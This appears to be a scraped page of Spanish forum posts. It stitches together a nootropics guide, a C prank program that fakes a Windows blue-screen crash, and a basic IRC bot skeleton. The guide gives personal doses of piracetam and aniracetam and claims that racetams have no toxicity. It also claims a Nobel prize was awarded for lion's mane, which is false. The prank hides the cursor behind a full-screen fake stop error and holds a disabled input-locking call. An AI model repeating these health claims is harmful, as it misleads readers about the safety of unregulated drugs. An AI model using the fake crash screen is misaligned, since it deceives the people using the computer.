De la misma manera, hay nootrópicos tales como el alcaoloide huperzina-A que inihiben la acetilcolinesterasa Inihibir la acetilcolinesterasa tiene el mismo efecto que que producir más acetilcolina. Por lo tanto, existen multitud de suplementos cuyo único fin es aumentar la cantidad de acetilcolina o inhibir la acetilcolinesterasa. Si mezclas varios de estos suplementos de manera aleatoria, como podrás observar, puede ser contraproducente y no se obtendrá el efecto sinergístico deseado. Dicha sinergia entre estos suplementos, insisto, es muy importante a tener en cuenta a la hora de seguir un régimen de nootrópicos.

Es importante tener en cuenta que sus efectos son acumulativos. La cafeína o las anfetaminas te petan el cerebro a lo largo del tiempo. Son soluciones a corto plazo que dan un "subidón" a tu cerebro durante un determinado periodo de tiempo para después dejarlo "normal" o con una bajona. Los suplementos (nootrópicos) mejoran la estructura y funciones del cerebro, es decir, funcionan a largo plazo. Dichos suplementos no son tóxicos (o tienen niveles de toxicidad muy bajos) y pueden usarse de manera frecuente.

Si estás comenzando mi consejo es probar estos suplementos: Piracetam, CDP colina y Sulbutiamina ó Piridoxina.


El Piracetam es el padrino de los nootrópicos. Cuando fue descubierto impresionó a los investigadores por tener niveles de toxicidad nulos y también aumentar las habilidades mentales de adultos normales sin ningún tipo de anomalía cerebral. El Piracetam (con un millar de estudios en su cinturón) ha demostrado incrementar diferentes áreas de inteligencia. Sus efectos son acumulativos (insisto otra vez) Esta página es una buena fuente te información. http://smartdrugsforthought.com/what-is-piracetam

Es recomendable tomar una fuente de colina con el Piracetam. Yo recomiendo la CDPcolina (yo compro la marca "Somazina"). El Piracetam necesita una fuente de colina ya que la acetilcolina es el neurotransmisor primario relacionado con el procesamiento de información.

La sulbutiamina, entre otras funciones, previene la fatiga mental. Puedes seguir estudiando después de una jornada normal tan fresco como una lechuga. La barrera sanguínea (hematoencefálica) es un "peaje" que cualquier nutriente debe cruzar para poder ser usada por el cerebro. La Sulbutiamina es una versión sintetizada de la tiamina que cruza dicha barrera sanguínea mejor que la tiamina regular. Tras cruzar la barrera sanguínea es rota en pequeñas partes de tiamina "normal". Es, en esencia, una fuente de tiamina específica del cerebro. La tiamina tiene un rol importantísimo en las actividades del desarrollo mental.

A partir de ahora también tomaré estos suplementos: Picamilon, Aniracetam, Melena de León, aceite de pescado, fosphatidylSerina y Bacopa. Como dijo Jack el Destripador, vayamos por partes:

El Picamilon es una droga de diseño. Los neutrotransmiroes GABA reducen el excitamiento nervioso. Sin embargo, tomar GABA oralmente no tienen ningún efecto porque no puede cruzar la barrera sanguínea cerebral. El Picamilon es una síntesis de la niacina (vitamina B3) y GABA que fue diseñada para cruzar la barrera sanguínea cerebral. Tras cruzar la barrera el pigamilion se rompe en niacina y GABA.


Estas tres chicas (vitaminas B) son pura poesía química. La sulbutiamina se rompe en dos partes de tiamina
(B1) tras cruzar la barrea sanguínea cerebral. El picamilon es roto en niacin (B3) y GABA tras cruzas la barrera hematoencefálica. El pyritinol es una versión mejorada de la B6. La combinación específica de las vitaminas B1, B3, B6 es mejor que ellas mismas puestas de manera individual. Son altamente sinergísticas entre ellas. Los Ángeles de Charlie, vaya.

El Aniracetam (familia de las "-racetam") es un derivado del Piracetam. Es mucho más potente que el Piracetam y tiene diferentes tipos de efectos. Tiene efectos sinergísticos con el
Piracetam. Tomo diariamente una dosis de 4000mg (vienen de 800mg las píldoras que compro) y la combinaré con
750 mg de Aniracetam. El aniracetam es un suplemento que recomiendo encarecidamente que busques por ti mismo
información, ya que nunca lo he tomado y ha sido sometido a menos estudios que el Piracetam. De hecho, es importante que toda la información que estás leyendo la contrastes y busques por tu cuenta, a fin de esclarecer lo que hace cada sustancia adecuadamente. Cualquier suplemento de la la familia "-racetam" no tiene toxicidad, tiene efectos acumulativos y mejora la estructura cerebral.

La melena de león es un hongo que ha sido usado por siglos en el este para mejorar el sistema nervioso. Recientemente se descubrió que esto se debe a que la melena de león incrementa el Factor de Crecimiento Nervioso ("NGF" de las siglas inglesas "nerve growth factor") es responsable de determinar el ratio en el cual las nuevas células cerebrales se producen. Se ganó un madafaka premio nobel por este descubrimiento porque no se conoce ninguna otra sustancia que pueda cruzar la barrera sanguínea cerebral y estimular la producción de NGF. Se han realizado estudios en el que la melena de león ha sido eficaz en casos con demencia para la mejora de la Medida de Independencia Funcional (FIM) valorando no solo el daño cerebral sino también las alteraciones cognitivas y psicosociales.

La fosfatidylcolina es sintentizada de la udiridina, colina y DHA. El aceite de pescado tiene dos omega-3 ácidos grasos: EPA y DHA

La CDPcolina se rompe y se convierte en uridina y colina. De esta manera, la fosphatidylcolina puede ser producida mediante la supelmentación de CDPcolina y aceite de pescado. Ambas, fosphatydlcolina y fosphatidylserina son los componentes esenciales de cada cúelula-membrana. Incrementar los niveles tanto de fosphatidylcolina como de fosphatidylserina mejora cualquier cuestión relacionada con la actividad mental.

La Bacopa es un suplemento herbal usado durante mucho tiempo en la India para mejorar la memoria. Tiene químicos únicos que poseen mecanismos de acción diferentes de cada otro suplemento en esta lista que muestro. Incluso de manera independiente tiene efectos potentes en la memoria. Repara, de hecho, antiguas neuronas dañadas y dendritos. Un efecto secundario interesante es que es efectivo para reducir la ansiedad ( se prescribe como medicamento anti-ansiedad, de hecho).

Por último: el ejercicio es crucial para una sinergia adecuada en el cerebro mediante los nootrópicos. El ejercicio te da un mayor nivel de función cognitiva de manera natural. De la misma manera, hay una enorme cantidad de estudios que han demostrado que la meditación mejora y genera nuevas sinapsis neuronales, es decir, te hace más listo.

Es un buen resumen de los nootrópicos más notorios. Tomar esta lista te costará unos 100 euros mensuales (ten que los principales son Piracetam, Colina y Subutiamina). Créeme, no sabes todo lo listo que puedes ser.

Recuerda, haz tu propia búsqueda, contrasta la información y prueba por ti mismo los diferentes efectos. Hazlo con paciencia y con cariño para contigo. Buena suerte.
_________________
http://www.burningecstasy.com/
fuente: http://www.13t.org/decondicionamiento/forum/viewtopic.php?t=2538
#88
hice este programa hace tiempo pero no lo habia posteado aca  ;D


#include <windows.h>
//#include <winable.h>
HINSTANCE miinstance;
// int bloqueo=0;

/*  Declare Windows procedure  */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);



/*  Make the class name into a global variable  */
char szClassName[ ] = "WindowsApp";

int WINAPI WinMain (HINSTANCE hThisInstance,
                   HINSTANCE hPrevInstance,
                   LPSTR lpszArgument,
                   int nFunsterStil)

{

   HWND hwnd;               /* This is the handle for our window */
   MSG messages;            /* Here messages to the application are saved */
   WNDCLASSEX wincl;        /* Data structure for the windowclass */
   miinstance=hThisInstance;

   /* The Window structure */
   wincl.hInstance = hThisInstance;
   wincl.lpszClassName = szClassName;
   wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
   wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
   wincl.cbSize = sizeof (WNDCLASSEX);

   /* Use default icon and mouse-pointer */
   wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
   wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
   wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
   wincl.lpszMenuName = NULL;                 /* No menu */
   wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
   wincl.cbWndExtra = 0;                      /* structure or the window instance */
   /* Use Windows's default color as the background of the window */
   wincl.hbrBackground = CreateSolidBrush( RGB(0x00, 0x00, 0xFF) );

   /* Register the window class, and if it fails quit the program */
   if (!RegisterClassEx (&wincl))
       return 0;

   /* The class is registered, let's create the program*/
   hwnd = CreateWindowEx (
          0,                   /* Extended possibilites for variation */
          szClassName,         /* Classname */
          "Windows App",       /* Title Text */
          WS_POPUP, /* default window */
          CW_USEDEFAULT,       /* Windows decides the position */
          CW_USEDEFAULT,       /* where the window ends up on the screen */
          544,                 /* The programs width */
          375,                 /* and height in pixels */
          HWND_DESKTOP,        /* The window is a child-window to desktop */
          NULL,                /* No menu */
          hThisInstance,       /* Program Instance handler */
          NULL                 /* No Window Creation data */
          );

   /* Make the window visible on the screen */
   ShowWindow(hwnd, SW_SHOWMAXIMIZED);
   ShowCursor(FALSE);

   /* Run the message loop. It will run until GetMessage() returns 0 */
   while (GetMessage (&messages, NULL, 0, 0))
   {
       /* Translate virtual-key messages into character messages */
       TranslateMessage(&messages);
       /* Send message to WindowProcedure */
       DispatchMessage(&messages);
   }

   /* The program return-value is 0 - The value that PostQuitMessage() gave */
   return messages.wParam;
}


/*  This function is called by the Windows function DispatchMessage()  */


HWND label;
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
   switch (message)                  /* handle the messages */
   {
       case WM_CREATE:
//             if (bloqueo==0){
//               BlockInput(true);
//               bloqueo=1;
//             }
            static HBRUSH pincel=CreateSolidBrush(RGB(192,192,192));
            static HBRUSH pincel2=CreateSolidBrush(RGB(0,0,255));
            static HWND etiqueta = CreateWindowEx(0,"STATIC", "   WINDOWS", WS_CHILD|WS_VISIBLE, 600, 150, 100, 18, hwnd, 0, miinstance, NULL);
            static HWND etiqueta2 = CreateWindowEx(0,"STATIC", "Se ha encontrado un problema y windows ha sido apagado para evitar daños al equipo.\n MACHINE_CHECK_EXCEPTION\nSi esta es la primera vez que se ve esta pantalla de error de detención, reinicie su equipo. Si esta pantalla aparece otra vez, siga los siguientes pasos:\nComprueba que cualquier hardware o software esta correctamente instalado, si es una nueva instalación, contacte con su proveedor de hardware o software para obtener actualizaciones de windows que pueda necesitar.\n", WS_CHILD|WS_VISIBLE, 250, 200, 600, 408, hwnd, 0, miinstance, NULL);
            static HWND etiqueta3 = CreateWindowEx(0,"STATIC", " *** STOP: 0x0000009C (0X00000004, 0X8054D570,0B2000000,0X00070F0F)", WS_CHILD|WS_VISIBLE,550,500,600,408, hwnd, 0, miinstance, NULL);

            break;
       case WM_CTLCOLORSTATIC:
       if(lParam==(LPARAM)etiqueta){
           SetBkColor((HDC)wParam, RGB(192,192,192));
           SetTextColor((HDC)wParam, RGB(0,0,255));
           return (LRESULT)pincel;
           }
       if(lParam==(LPARAM)etiqueta2 || lParam==(LPARAM)etiqueta3){
           SetBkColor((HDC)wParam, RGB(0,0,255));
           SetTextColor((HDC)wParam, RGB(255,255,255));
           return (LRESULT)pincel2;
           }
           break;
       case WM_DESTROY:
           PostQuitMessage (0);       /* send a WM_QUIT to the message queue */
           break;
       default:                      /* for messages that we don't deal with */
           return DefWindowProc (hwnd, message, wParam, lParam);
   }

   return 0;
}

#89
Foro Libre / promocionar canal irc
24 Junio 2013, 19:56 PM
si se habran dado cuenta tengo en la firma un enlace al chat quienes quieran ponerselo aca lo dejo


http://pastebin.com/ZacchPJ3


saludos :)
#90
a pesar de lo simple del programa me costo bastante hacerlo estaba muy acostumbrado a las expresiones regulares de lenguajes  como python  no hace nada como dije un esqueleto donde  es muy facil usar los datos y hacer que el bot haga lo que uno quiera
seguramente se pueden mejorar muchas cosas  pero de esta forma funciona  :)

#include <winsock2.h>
#include <windows.h>
#include <cstring>
#include <cstdio>

void comandos(char *usuario,char *cmand, char *sala,char *mensaje)
{
printf("Usuario: %s\n",usuario);
printf("Comando irc: %s\n",cmand);
printf("sala: %s\n",sala);
printf("mensaje: %s\n",mensaje);
//char comando[130]="PRIVMSG #botslols :Soy un inutil bot en c :(\r\n";
//send(sock,comando,strlen(comandos),0);
}


int main()
{
SetConsoleTitle("irc bot");
   WSADATA wsa;
   SOCKET sock;
   int conex;
   int len;
   char Buffer[1024];
   //
   char peticion1[]="NICK BOTpurakerdal\r\n"; // nombre del bot
   char peticion2[]="USER BOTpurakerdal 1 1 1\r\n"; //nombre completo
   char peticion3[]="JOIN #botslols\r\n";   //sala
   int enviado=0;

   char pong[130]="PONG :";
   char ping[130]={0};
   struct hostent *host;
   struct sockaddr_in direc;
   WSAStartup(MAKEWORD(2,0),&wsa);
   host=gethostbyname("chat.freenode.net");
   sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (sock==-1)
  {
     printf("Error al crear el socket");
     return -1;
  }
   direc.sin_family=AF_INET;
   direc.sin_port=htons(6667);
   direc.sin_addr = *((struct in_addr *)host->h_addr);
   memset(direc.sin_zero,0,8);
   conex=connect(sock,(sockaddr *)&direc, sizeof(sockaddr));
   if(conex==-1)
   {
       printf("error\n");
       return -1;
   }
   printf("[+]conexion establecida\n");
   enviado=send(sock, peticion1,strlen(peticion1), 0);
   printf("[+]nick registrado\n");
   enviado=send(sock, peticion2,strlen(peticion2), 0);
   enviado=send(sock, peticion3,strlen(peticion3), 0);
   printf("[+]entrando a la sala\n-\n");
   int final3;
   int ciclo2;
//-------------------------------
   char cadenita[500];
   char cadenita2[500];
   char usuario[500];
   char sala[500];
   char cmand[500];
   char mensaje[500];
//--------------------------
   char *star;

   //------------------
   int ciclo;
   while (len!=-1 && strcmp(Buffer,"salir")!=0)
   {
       fflush(stdout);
       len = recv(sock, Buffer, sizeof(Buffer), 0);
       

//enviar el pong que es la respuesta al ping de irc
      for(int ewe=0;ewe != len;ewe++)
      {
       if((Buffer[ewe]=='P')&&(Buffer[ewe+1]=='I')&&(Buffer[ewe+2]=='N')&&(Buffer[ewe+3]=='G'))
       {
           memcpy(ping,Buffer+ewe+6,10);
           memcpy(pong+6,ping,10);
           memcpy(pong+16,"\r\n",strlen("\r\n"));
           send(sock,pong,strlen(pong),0);

       }
      }
     
//---------------------------------------
      if(Buffer[0]==':') // si comienza en : es un comando
      {


      for(ciclo=0;(ciclo<500)&&(Buffer[ciclo]!='\r');ciclo++)
      {
        cadenita[ciclo]=Buffer[ciclo];
      }
      //le quitamos la basura al buffer
       strcpy(cadenita2,cadenita); //necesito la cadena completa strtok la parte
       star=strtok(cadenita," "); // parto la cadena la primera palabra es el user
       strcpy(usuario,star); // pongo el user en la variable usuario
       star=strtok(NULL," "); // tomo la siguente palabra
       strcpy(cmand,star); // tomo el comando de irc
       star=strtok(NULL," ");
       strcpy(sala,star); // esta es la sala
       memcpy(mensaje,(cadenita2+strlen(usuario)+strlen(cmand)+strlen(sala)+4),500); // es decir todo lo anterior a el mensaje no se copia eso mas 3 espacios mas este caracter : es decir 4
       comandos(usuario,cmand,sala,mensaje);
}
}
   return 0;
}